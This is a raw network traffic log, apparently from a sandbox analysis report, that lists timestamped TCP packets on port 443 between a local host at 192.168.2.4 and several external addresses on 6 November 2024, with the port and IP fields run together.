                                                                                                                                                                                                            Nov 6, 2024 06:29:45.000896931 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.001869917 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.001878023 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.030447960 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.030493975 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.030502081 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.030891895 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.031032085 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.031040907 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.031074047 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.031157017 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.033895016 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.033900976 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.042659998 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.042753935 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.043365002 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.043401957 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.043412924 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.043570042 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.044338942 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.044342041 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.044394970 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.045871019 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074470043 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074537992 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074543953 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074645042 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074683905 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074688911 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.074769020 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.081752062 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106031895 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106043100 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106210947 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106241941 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106336117 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106337070 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106353998 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.106615067 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.107953072 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.107973099 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108035088 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108038902 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108041048 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108046055 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108071089 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108095884 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108098984 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108978033 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.108992100 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.109051943 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.109057903 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.112071991 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.123387098 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.123429060 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.125873089 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.149787903 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.149878025 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153719902 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153729916 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153800964 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153863907 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153863907 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.153878927 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154278040 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154433012 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154442072 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154850006 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154901028 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.154913902 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.155112982 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163722038 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163731098 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163767099 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163799047 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163809061 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.163839102 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.178051949 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.178086996 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.179136038 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.179157019 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.179203033 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.179519892 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.179537058 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.197896957 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.197999001 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.199822903 CET57713443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.199848890 CET4435771313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.199918985 CET57713443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.199925900 CET4435771313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.200560093 CET57716443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.200560093 CET57716443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.200587034 CET4435771613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.200594902 CET4435771613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.209847927 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.209850073 CET57712443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.209875107 CET4435771213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.209969044 CET57712443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.209976912 CET4435771213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211188078 CET57715443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211188078 CET57715443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211198092 CET4435771513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211206913 CET4435771513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211957932 CET57714443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211963892 CET4435771413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211994886 CET57714443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.211997986 CET4435771413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.217061043 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.217083931 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.217247963 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.218451977 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.218461990 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221514940 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221514940 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221545935 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221553087 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221613884 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.221615076 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.222122908 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.222136974 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225367069 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225384951 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225416899 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225435019 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225446939 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225454092 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225481033 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225486994 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225492001 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225528002 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225528002 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225536108 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225562096 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225564957 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225837946 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.225919008 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.226037025 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.227015018 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.227024078 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.227101088 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.227350950 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.227365971 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.229212999 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.229237080 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.229270935 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.229286909 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.241873980 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.241895914 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.245451927 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246834040 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246845007 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246874094 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246886015 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246896982 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246908903 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.246911049 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.247195005 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.248016119 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.248040915 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.256839037 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.257152081 CET57719443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.257183075 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.257489920 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.258320093 CET57719443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.258392096 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.260288000 CET57719443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.269300938 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.269452095 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277117968 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277225018 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277256012 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277261972 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277280092 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.277513981 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.278687000 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.278727055 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.278757095 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.278763056 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.278795004 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.294543028 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.296978951 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.296992064 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.297326088 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.299480915 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.299551964 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.301879883 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.303339005 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.324596882 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.336446047 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.337368011 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.337387085 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.338363886 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.338464975 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.341598988 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.341617107 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.341774940 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.341788054 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.341847897 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342551947 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342596054 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342623949 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342631102 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342657089 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342663050 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.342721939 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343190908 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343200922 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343239069 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343250036 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343333960 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343333960 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343333960 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343343973 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.343611956 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344259024 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344532967 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344613075 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344685078 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344713926 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.344742060 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.345077038 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.345166922 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.345518112 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.345529079 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.349737883 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.350445032 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.350456953 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.390535116 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.390573978 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.390589952 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.390621901 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.390638113 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.393033981 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400777102 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400785923 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400825977 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400839090 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400850058 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400862932 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400892973 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.400913000 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412324905 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412333012 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412381887 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412389040 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412404060 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412415028 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412444115 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.412453890 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.432640076 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.432756901 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.432810068 CET57719443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.433923960 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.454651117 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.454670906 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.454718113 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.454727888 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.454762936 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.461805105 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.461868048 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.461910009 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.464221001 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.464281082 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.464754105 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.464807034 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.465102911 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.465151072 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.481251001 CET57720443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.481270075 CET44357720172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.483321905 CET57719443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.483330965 CET44357719162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.494261026 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.494281054 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.494348049 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.494362116 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.494405031 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.508230925 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.508301020 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.508312941 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.508364916 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.508407116 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.530611038 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.530658960 CET44357729162.159.140.34192.168.2.4
